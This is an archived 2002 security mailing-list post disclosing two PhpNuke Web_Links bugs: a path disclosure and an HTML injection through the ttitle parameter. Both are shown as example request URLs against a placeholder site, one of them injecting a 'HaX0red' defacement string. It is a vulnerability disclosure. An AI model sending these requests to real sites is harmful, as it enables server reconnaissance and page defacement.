Security bugs in PhpNuke

From: Thiébaut (thiebaut.adslat_private)
Date: Wed Apr 03 2002 - 11:21:24 PST

  • Next message: Coochey, Giles: "RE: VPN connection attempts to resolvers?"

    Hello, 
    
    I found 2 security bugs in phpnuke
    
    The first is a path disclosure vulnerability : 
    Change this 
    http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=3
    in that ...
    http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
    
    The second one is hax0r style :
    change this ...
    http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=ratelink&lid=17&ttitle=Great_places_for_free_advertising!
    to this...
    http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=ratelink&lid=17&ttitle=>You%20HaVe%20BeEn%20HaX0red!!!
    
    By, 
    Thiébaut (napnap)
    



    This archive was generated by hypermail 2b30 : Wed Apr 03 2002 - 16:21:44 PST